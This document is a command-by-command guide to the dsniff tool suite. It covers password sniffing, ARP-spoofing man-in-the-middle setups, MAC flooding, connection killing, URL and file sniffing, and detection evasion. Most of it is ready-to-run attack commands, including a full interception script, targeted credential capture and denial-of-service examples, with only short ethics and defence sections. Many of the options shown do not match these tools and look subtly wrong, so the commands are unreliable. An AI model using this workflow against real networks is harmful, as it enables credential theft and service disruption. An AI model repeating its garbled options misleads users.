dsniff

Overview

dsniff is a collection of powerful network auditing and penetration testing tools designed for password sniffing, traffic interception, and man-in-the-middle (MITM) attacks. The suite includes multiple utilities like dsniff (password sniffer), arpspoof (ARP spoofing), macof (MAC flooding), tcpkill (TCP session killer), urlsnarf (URL sniffing), and filesnarf (file transfer sniffing). These tools are essential for network security testing but require careful ethical use and proper authorization.

Installation

Debian/Ubuntu

sudo apt-get update
sudo apt-get install dsniff

Kali Linux (pre-installed)

which dsniff
dsniff -h

From source

git clone https://github.com/dsniff-mirror/dsniff.git
cd dsniff
./configure
make
sudo make install

Verify installation

dsniff -h
arpspoof -h
macof -h
tcpkill -h
urlsnarf -h
filesnarf -h

Core Tools Overview

Tool	Purpose
dsniff	Capture and display passwords from network traffic
arpspoof	Spoof ARP packets to redirect traffic
macof	Flood network with bogus MAC addresses
tcpkill	Kill TCP connections
urlsnarf	Capture URLs from HTTP traffic
filesnarf	Sniff files from NFS traffic

dsniff - Password Sniffer

Basic password sniffing

# Capture passwords on default interface
sudo dsniff

# Capture on specific interface
sudo dsniff -i eth0

# Verbose output
sudo dsniff -v

# Save to file
sudo dsniff -w passwords.log

# Specific protocol
sudo dsniff -n ftp
sudo dsniff -n http

Advanced sniffing

# Sniff specific subnet
sudo dsniff 10.0.0.0/24

# Multiple protocols
sudo dsniff -n "ftp http telnet pop3"

# High verbosity
sudo dsniff -vv

# Output to pcap file
sudo dsniff -f filter_expression -w capture.pcap

arpspoof - ARP Spoofing

Basic ARP spoofing

# Spoof ARP between target and gateway
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1

# Spoof bidirectional traffic
sudo arpspoof -i eth0 -t 10.0.0.100 -T 10.0.0.1 10.0.0.1

# Verbose output
sudo arpspoof -v 10.0.0.100

MITM setup with ARP spoofing

# Terminal 1: Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Terminal 2: Spoof target
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1

# Terminal 3: Spoof gateway
sudo arpspoof -i eth0 -t 10.0.0.1 10.0.0.100

# Terminal 4: Sniff traffic
sudo dsniff -i eth0

Selective ARP spoofing

# Spoof specific target only
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Spoof multiple targets
for target in 192.168.1.{100,101,102}; do
  sudo arpspoof -i eth0 -t "$target" 192.168.1.1 &
done

# Background process
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1 > /dev/null 2>&1 &

macof - MAC Flooding

Basic MAC flooding

# Flood switch with fake MAC addresses
sudo macof -i eth0

# Flood specific subnet
sudo macof -i eth0 -n 10.0.0.0/24

# Custom delay between packets
sudo macof -i eth0 -d 10

# Spoof specific gateway
sudo macof -i eth0 -g 10.0.0.1

Flooding scenarios

# Continuous flooding
sudo macof -i eth0 -c 0

# Limited packets
sudo macof -i eth0 -c 1000

# Verbose output
sudo macof -v

# With source MAC
sudo macof -e 00:11:22:33:44:55

tcpkill - TCP Session Killer

Kill TCP connections

# Kill all HTTP traffic
sudo tcpkill -i eth0 'tcp port http'

# Kill specific connection
sudo tcpkill -i eth0 'tcp and host 10.0.0.100'

# Kill SSH connections from specific IP
sudo tcpkill -i eth0 'tcp and src 10.0.0.100 and port 22'

# Kill HTTPS traffic
sudo tcpkill -i eth0 'tcp port 443'

Advanced tcpkill usage

# Verbose mode
sudo tcpkill -v -i eth0 'tcp port ftp'

# Show packets being killed
sudo tcpkill -n -i eth0 'tcp port http'

# Custom RST packet
sudo tcpkill -s 10 'tcp port 80'

urlsnarf - URL Sniffing

Capture URLs

# Sniff all HTTP URLs
sudo urlsnarf -i eth0

# Sniff from specific subnet
sudo urlsnarf -i eth0 10.0.0.0/24

# Verbose output
sudo urlsnarf -v

# Save to file
sudo urlsnarf -i eth0 > urls.txt

Filtering URLs

# Monitor in real-time and filter
sudo urlsnarf -i eth0 | grep -i ".pdf\|.doc"

# Extract just domains
sudo urlsnarf -i eth0 | awk -F'/' '{print $1}' | sort | uniq

# Get specific file types
sudo urlsnarf -i eth0 | grep -E "\.(jpg|png|gif|zip)"

filesnarf - File Sniffing

Sniff NFS files

# Sniff NFS traffic
sudo filesnarf -i eth0

# Target specific host
sudo filesnarf -i eth0 nfs.server.com

# Monitor specific subnet
sudo filesnarf -i eth0 10.0.0.0/24

# Save files to directory
sudo filesnarf -i eth0 -d /tmp/sniffed_files

Integration with other tools

# Combine with arpspoof for MITM
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1 &
sudo filesnarf -i eth0

Complete MITM Attack Workflow

Setup phase

# Enable IP forwarding (critical for MITM)
sudo sysctl -w net.ipv4.ip_forward=1

# Enable IP forwarding permanently
echo "net.ipv4.ip_forward=1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p

ARP spoofing phase

#!/bin/bash
TARGET="10.0.0.100"
GATEWAY="10.0.0.1"
INTERFACE="eth0"

echo "[*] Starting ARP spoofing..."
echo "[*] Spoofing $TARGET and $GATEWAY"

# Spoof target
sudo arpspoof -i "$INTERFACE" -t "$TARGET" "$GATEWAY" &
SPOOF1=$!

# Spoof gateway
sudo arpspoof -i "$INTERFACE" -t "$GATEWAY" "$TARGET" &
SPOOF2=$!

echo "[+] ARP spoofing processes: $SPOOF1 $SPOOF2"

Sniffing phase

# Multiple sniffing operations
sudo dsniff -i eth0 -w dsniff.log &
sudo urlsnarf -i eth0 > urls.log &
sudo filesnarf -i eth0 &

# Monitor in real-time
tail -f dsniff.log
tail -f urls.log

Cleanup

# Kill all background processes
killall arpspoof dsniff urlsnarf filesnarf tcpkill

# Disable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0

# Send ARP announcements to restore routing
sudo arpspoof -i eth0 -c 5 "$TARGET" "$GATEWAY"
sudo arpspoof -i eth0 -c 5 "$GATEWAY" "$TARGET"

Advanced Scenarios

Network surveillance

# Capture all traffic to a subnet
sudo tcpdump -i eth0 -n -w network_capture.pcap net 10.0.0.0/24

# Analyze with dsniff
sudo dsniff -f 'not port 22' -w sensitive.log

# Monitor multiple protocols
sudo dsniff -n "http ftp telnet pop3 imap"

Targeted credential capture

# FTP capture with arpspoof
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1 &
sudo dsniff -i eth0 -n ftp

# HTTP authentication sniffing
sudo dsniff -i eth0 -n http

# SMTP credential capture
sudo dsniff -i eth0 -n smtp

Denial of service with tcpkill

# Kill all SSH connections
sudo tcpkill -i eth0 'tcp port 22'

# Kill web traffic from specific IP
sudo tcpkill -i eth0 'host 10.0.0.100 and tcp port 80'

# Disconnect user from network
sudo tcpkill -i eth0 'src 10.0.0.100'

Traffic redirection and monitoring

# Monitor and log all HTTP traffic
sudo urlsnarf -i eth0 | tee http_log.txt

# Real-time URL filtering
sudo urlsnarf -i eth0 | grep -v "google\|facebook\|twitter"

# Extract sensitive URLs
sudo urlsnarf -i eth0 | grep -E "login|password|admin"

Detection and Evasion

Detect ARP spoofing

# Monitor for ARP inconsistencies
sudo arpwatch -i eth0

# Manual ARP inspection
arp -a

# Check for duplicate IPs
arp-scan --localnet

Evade detection

# Use random MAC addresses
sudo macof -e 00:11:22:$(printf '%02x:%02x:%02x' $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)))

# Slow down ARP spoofing
sudo arpspoof -i eth0 -d -t target gateway

Legal and Ethical Considerations

Authorization requirements

• Only use on networks you own or have explicit written permission to test
• Inform network administrators before testing
• Document all testing activities
• Respect privacy and data protection laws
• Never capture or use credentials maliciously
• Follow responsible disclosure practices

Defensive measures

# Protect against ARP spoofing
sudo ip route add 10.0.0.1 dev eth0

# Static ARP entries
sudo arp -s 10.0.0.1 00:11:22:33:44:55

# DHCP snooping and DAI (Dynamic ARP Inspection)
# Configure on managed switches

Troubleshooting

No passwords captured

# Verify interface is in promiscuous mode
ip link show eth0

# Set promiscuous mode
sudo ip link set eth0 promisc on

# Check IP forwarding is enabled
cat /proc/sys/net/ipv4/ip_forward

# Verify ARP spoofing is working
arp -a | grep -i "incomplete"

ARP spoofing not working

# Check network connectivity
ping target_ip
ping gateway_ip

# Verify correct interface
ifconfig

# Check firewall rules
sudo iptables -L

# Test with verbose mode
sudo arpspoof -v -i eth0 -t target gateway

Best Practices

• Always have explicit authorization before testing
• Use in isolated lab environments when possible
• Maintain detailed logs of all activities
• Clean up and restore network state after testing
• Use strong passwords to prevent credential theft
• Monitor your own networks for suspicious activity
• Implement network security controls
• Consider using encrypted protocols (SSH, HTTPS, etc.)
• Use intrusion detection systems to monitor for attacks
• Keep systems updated and patched

Resources

• dsniff GitHub: https://github.com/dsniff-mirror/dsniff
• ARP Spoofing: https://en.wikipedia.org/wiki/ARP_spoofing
• MITM Attack Guide: https://owasp.org/www-community/attacks/Manipulator-in-the-middle_attack
• Network Security: https://www.cisco.com/c/en/us/support/docs/security/
• tcpdump Guide: https://www.tcpdump.org/